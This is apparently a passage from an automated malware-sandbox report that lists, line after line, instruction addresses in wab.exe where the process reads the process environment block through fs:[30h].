        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD96D10 mov eax, dword ptr fs:[00000030h]10_2_1FD96D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD96D10 mov eax, dword ptr fs:[00000030h]10_2_1FD96D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D00 mov eax, dword ptr fs:[00000030h]10_2_1FDB3D00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDBAD00 mov eax, dword ptr fs:[00000030h]10_2_1FDBAD00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDBAD00 mov eax, dword ptr fs:[00000030h]10_2_1FDBAD00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDBAD00 mov eax, dword ptr fs:[00000030h]10_2_1FDBAD00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE58D10 mov eax, dword ptr fs:[00000030h]10_2_1FE58D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE58D10 mov eax, dword ptr fs:[00000030h]10_2_1FE58D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD97CD5 mov eax, dword ptr fs:[00000030h]10_2_1FD97CD5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD97CD5 mov eax, dword ptr fs:[00000030h]10_2_1FD97CD5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD97CD5 mov eax, dword ptr fs:[00000030h]10_2_1FD97CD5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD97CD5 mov eax, dword ptr fs:[00000030h]10_2_1FD97CD5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD97CD5 mov eax, dword ptr fs:[00000030h]10_2_1FD97CD5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9CCC8 mov eax, dword ptr fs:[00000030h]10_2_1FD9CCC8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB1CC7 mov eax, dword ptr fs:[00000030h]10_2_1FDB1CC7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB1CC7 mov eax, dword ptr fs:[00000030h]10_2_1FDB1CC7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD5CC0 mov eax, dword ptr fs:[00000030h]10_2_1FDD5CC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD5CC0 mov eax, dword ptr fs:[00000030h]10_2_1FDD5CC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE41CF9 mov eax, dword ptr fs:[00000030h]10_2_1FE41CF9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE41CF9 mov eax, dword ptr fs:[00000030h]10_2_1FE41CF9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE41CF9 mov eax, dword ptr fs:[00000030h]10_2_1FE41CF9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD2CF0 mov eax, dword ptr fs:[00000030h]10_2_1FDD2CF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD2CF0 mov eax, dword ptr fs:[00000030h]10_2_1FDD2CF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD2CF0 mov eax, dword ptr fs:[00000030h]10_2_1FDD2CF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD2CF0 mov eax, dword ptr fs:[00000030h]10_2_1FDD2CF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE23CDB mov eax, dword ptr fs:[00000030h]10_2_1FE23CDB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE23CDB mov eax, dword ptr fs:[00000030h]10_2_1FE23CDB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE23CDB mov eax, dword ptr fs:[00000030h]10_2_1FE23CDB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE4FCDF mov eax, dword ptr fs:[00000030h]10_2_1FE4FCDF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE4FCDF mov eax, dword ptr fs:[00000030h]10_2_1FE4FCDF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE4FCDF mov eax, dword ptr fs:[00000030h]10_2_1FE4FCDF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1CCA0 mov ecx, dword ptr fs:[00000030h]10_2_1FE1CCA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1CCA0 mov eax, dword ptr fs:[00000030h]10_2_1FE1CCA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1CCA0 mov eax, dword ptr fs:[00000030h]10_2_1FE1CCA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1CCA0 mov eax, dword ptr fs:[00000030h]10_2_1FE1CCA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h]10_2_1FE5FCAB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h]10_2_1FE5FCAB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h]10_2_1FE5FCAB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h]10_2_1FE5FCAB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h]10_2_1FE5FCAB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h]10_2_1FE5FCAB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h]10_2_1FE5FCAB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h]10_2_1FE5FCAB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h]10_2_1FE5FCAB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h]10_2_1FE5FCAB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h]10_2_1FE5FCAB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h]10_2_1FE5FCAB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h]10_2_1FE5FCAB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FCAB mov eax, dword ptr fs:[00000030h]10_2_1FE5FCAB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h]10_2_1FE50CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h]10_2_1FE50CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h]10_2_1FE50CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h]10_2_1FE50CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h]10_2_1FE50CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h]10_2_1FE50CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h]10_2_1FE50CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h]10_2_1FE50CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h]10_2_1FE50CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h]10_2_1FE50CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h]10_2_1FE50CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h]10_2_1FE50CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE50CB5 mov eax, dword ptr fs:[00000030h]10_2_1FE50CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD98C8D mov eax, dword ptr fs:[00000030h]10_2_1FD98C8D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA3C84 mov eax, dword ptr fs:[00000030h]10_2_1FDA3C84
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA3C84 mov eax, dword ptr fs:[00000030h]10_2_1FDA3C84
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA3C84 mov eax, dword ptr fs:[00000030h]10_2_1FDA3C84
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA3C84 mov eax, dword ptr fs:[00000030h]10_2_1FDA3C84
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDC8CB1 mov eax, dword ptr fs:[00000030h]10_2_1FDC8CB1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDC8CB1 mov eax, dword ptr fs:[00000030h]10_2_1FDC8CB1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9DCA0 mov eax, dword ptr fs:[00000030h]10_2_1FD9DCA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCFCA0 mov ecx, dword ptr fs:[00000030h]10_2_1FDCFCA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCFCA0 mov eax, dword ptr fs:[00000030h]10_2_1FDCFCA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCFCA0 mov eax, dword ptr fs:[00000030h]10_2_1FDCFCA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCFCA0 mov eax, dword ptr fs:[00000030h]10_2_1FDCFCA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCFCA0 mov eax, dword ptr fs:[00000030h]10_2_1FDCFCA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDBCA0 mov eax, dword ptr fs:[00000030h]10_2_1FDDBCA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDBCA0 mov eax, dword ptr fs:[00000030h]10_2_1FDDBCA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDBCA0 mov ecx, dword ptr fs:[00000030h]10_2_1FDDBCA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDBCA0 mov eax, dword ptr fs:[00000030h]10_2_1FDDBCA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD4C59 mov eax, dword ptr fs:[00000030h]10_2_1FDD4C59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h]10_2_1FDAAC50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h]10_2_1FDAAC50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h]10_2_1FDAAC50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h]10_2_1FDAAC50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h]10_2_1FDAAC50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAAC50 mov eax, dword ptr fs:[00000030h]10_2_1FDAAC50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA6C50 mov eax, dword ptr fs:[00000030h]10_2_1FDA6C50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA6C50 mov eax, dword ptr fs:[00000030h]10_2_1FDA6C50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA6C50 mov eax, dword ptr fs:[00000030h]10_2_1FDA6C50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD97C40 mov eax, dword ptr fs:[00000030h]10_2_1FD97C40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD97C40 mov ecx, dword ptr fs:[00000030h]10_2_1FD97C40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD97C40 mov eax, dword ptr fs:[00000030h]10_2_1FD97C40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD97C40 mov eax, dword ptr fs:[00000030h]10_2_1FD97C40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD1C7C mov eax, dword ptr fs:[00000030h]10_2_1FDD1C7C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FC4F mov eax, dword ptr fs:[00000030h]10_2_1FE5FC4F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB1C60 mov eax, dword ptr fs:[00000030h]10_2_1FDB1C60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6DC27 mov eax, dword ptr fs:[00000030h]10_2_1FE6DC27
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6DC27 mov eax, dword ptr fs:[00000030h]10_2_1FE6DC27
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6DC27 mov eax, dword ptr fs:[00000030h]10_2_1FE6DC27
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE29C32 mov eax, dword ptr fs:[00000030h]10_2_1FE29C32
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB0C00 mov eax, dword ptr fs:[00000030h]10_2_1FDB0C00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB0C00 mov eax, dword ptr fs:[00000030h]10_2_1FDB0C00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB0C00 mov eax, dword ptr fs:[00000030h]10_2_1FDB0C00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB0C00 mov eax, dword ptr fs:[00000030h]10_2_1FDB0C00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE71C3C mov eax, dword ptr fs:[00000030h]10_2_1FE71C3C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDCC00 mov eax, dword ptr fs:[00000030h]10_2_1FDDCC00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE7BC01 mov eax, dword ptr fs:[00000030h]10_2_1FE7BC01
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE7BC01 mov eax, dword ptr fs:[00000030h]10_2_1FE7BC01
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDBC3B mov esi, dword ptr fs:[00000030h]10_2_1FDDBC3B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE24C0F mov eax, dword ptr fs:[00000030h]10_2_1FE24C0F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9EC20 mov eax, dword ptr fs:[00000030h]10_2_1FD9EC20
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3BD6 mov eax, dword ptr fs:[00000030h]10_2_1FDB3BD6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3BD6 mov eax, dword ptr fs:[00000030h]10_2_1FDB3BD6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3BD6 mov eax, dword ptr fs:[00000030h]10_2_1FDB3BD6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3BD6 mov eax, dword ptr fs:[00000030h]10_2_1FDB3BD6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3BD6 mov eax, dword ptr fs:[00000030h]10_2_1FDB3BD6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD97BCD mov eax, dword ptr fs:[00000030h]10_2_1FD97BCD
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD97BCD mov ecx, dword ptr fs:[00000030h]10_2_1FD97BCD
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDC0BCB mov eax, dword ptr fs:[00000030h]10_2_1FDC0BCB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDC0BCB mov eax, dword ptr fs:[00000030h]10_2_1FDC0BCB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDC0BCB mov eax, dword ptr fs:[00000030h]10_2_1FDC0BCB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA0BCD mov eax, dword ptr fs:[00000030h]10_2_1FDA0BCD
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA0BCD mov eax, dword ptr fs:[00000030h]10_2_1FDA0BCD
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA0BCD mov eax, dword ptr fs:[00000030h]10_2_1FDA0BCD
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA9BC4 mov eax, dword ptr fs:[00000030h]10_2_1FDA9BC4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCEBFC mov eax, dword ptr fs:[00000030h]10_2_1FDCEBFC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA8BF0 mov eax, dword ptr fs:[00000030h]10_2_1FDA8BF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA8BF0 mov eax, dword ptr fs:[00000030h]10_2_1FDA8BF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA8BF0 mov eax, dword ptr fs:[00000030h]10_2_1FDA8BF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE1BEF mov eax, dword ptr fs:[00000030h]10_2_1FDE1BEF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE1BEF mov eax, dword ptr fs:[00000030h]10_2_1FDE1BEF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE4EBD0 mov eax, dword ptr fs:[00000030h]10_2_1FE4EBD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE2FBDC mov eax, dword ptr fs:[00000030h]10_2_1FE2FBDC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE2FBDC mov eax, dword ptr fs:[00000030h]10_2_1FE2FBDC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE2FBDC mov eax, dword ptr fs:[00000030h]10_2_1FE2FBDC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD9B9F mov eax, dword ptr fs:[00000030h]10_2_1FDD9B9F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD9B9F mov eax, dword ptr fs:[00000030h]10_2_1FDD9B9F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD9B9F mov eax, dword ptr fs:[00000030h]10_2_1FDD9B9F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB0BBE mov eax, dword ptr fs:[00000030h]10_2_1FDB0BBE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB0BBE mov eax, dword ptr fs:[00000030h]10_2_1FDB0BBE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE69B8B mov eax, dword ptr fs:[00000030h]10_2_1FE69B8B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE69B8B mov eax, dword ptr fs:[00000030h]10_2_1FE69B8B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FB97 mov eax, dword ptr fs:[00000030h]10_2_1FE5FB97
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h]10_2_1FDCDBA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h]10_2_1FDCDBA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h]10_2_1FDCDBA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h]10_2_1FDCDBA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h]10_2_1FDCDBA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCDBA0 mov eax, dword ptr fs:[00000030h]10_2_1FDCDBA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9FB4C mov edi, dword ptr fs:[00000030h]10_2_1FD9FB4C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6AB40 mov eax, dword ptr fs:[00000030h]10_2_1FE6AB40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE48B42 mov eax, dword ptr fs:[00000030h]10_2_1FE48B42
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9CB7E mov eax, dword ptr fs:[00000030h]10_2_1FD9CB7E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE68B28 mov eax, dword ptr fs:[00000030h]10_2_1FE68B28
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE68B28 mov eax, dword ptr fs:[00000030h]10_2_1FE68B28
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCDB00 mov eax, dword ptr fs:[00000030h]10_2_1FDCDB00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCDB00 mov eax, dword ptr fs:[00000030h]10_2_1FDCDB00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCDB00 mov eax, dword ptr fs:[00000030h]10_2_1FDCDB00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCDB00 mov eax, dword ptr fs:[00000030h]10_2_1FDCDB00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCDB00 mov eax, dword ptr fs:[00000030h]10_2_1FDCDB00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCDB00 mov edx, dword ptr fs:[00000030h]10_2_1FDCDB00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA1B04 mov eax, dword ptr fs:[00000030h]10_2_1FDA1B04
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA1B04 mov eax, dword ptr fs:[00000030h]10_2_1FDA1B04
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5FB0C mov eax, dword ptr fs:[00000030h]10_2_1FE5FB0C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD9B28 mov eax, dword ptr fs:[00000030h]10_2_1FDD9B28
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD9B28 mov eax, dword ptr fs:[00000030h]10_2_1FDD9B28
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h]10_2_1FE1EB1D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h]10_2_1FE1EB1D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h]10_2_1FE1EB1D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h]10_2_1FE1EB1D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h]10_2_1FE1EB1D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h]10_2_1FE1EB1D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h]10_2_1FE1EB1D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h]10_2_1FE1EB1D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1EB1D mov eax, dword ptr fs:[00000030h]10_2_1FE1EB1D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCEB20 mov eax, dword ptr fs:[00000030h]10_2_1FDCEB20
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCEB20 mov eax, dword ptr fs:[00000030h]10_2_1FDCEB20
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCBADA mov eax, dword ptr fs:[00000030h]10_2_1FDCBADA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA0AD0 mov eax, dword ptr fs:[00000030h]10_2_1FDA0AD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD4AD0 mov eax, dword ptr fs:[00000030h]10_2_1FDD4AD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD4AD0 mov eax, dword ptr fs:[00000030h]10_2_1FDD4AD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDF6ACC mov eax, dword ptr fs:[00000030h]10_2_1FDF6ACC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDF6ACC mov eax, dword ptr fs:[00000030h]10_2_1FDF6ACC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDF6ACC mov eax, dword ptr fs:[00000030h]10_2_1FDF6ACC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE21ACB mov eax, dword ptr fs:[00000030h]10_2_1FE21ACB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE21ACB mov ecx, dword ptr fs:[00000030h]10_2_1FE21ACB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDAAEE mov eax, dword ptr fs:[00000030h]10_2_1FDDAAEE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDAAEE mov eax, dword ptr fs:[00000030h]10_2_1FDDAAEE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9BAE0 mov eax, dword ptr fs:[00000030h]10_2_1FD9BAE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE4DAAC mov ecx, dword ptr fs:[00000030h]10_2_1FE4DAAC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE4DAAC mov ecx, dword ptr fs:[00000030h]10_2_1FE4DAAC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE4DAAC mov eax, dword ptr fs:[00000030h]10_2_1FE4DAAC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD8A90 mov edx, dword ptr fs:[00000030h]10_2_1FDD8A90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD97A80 mov eax, dword ptr fs:[00000030h]10_2_1FD97A80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD97A80 mov eax, dword ptr fs:[00000030h]10_2_1FD97A80
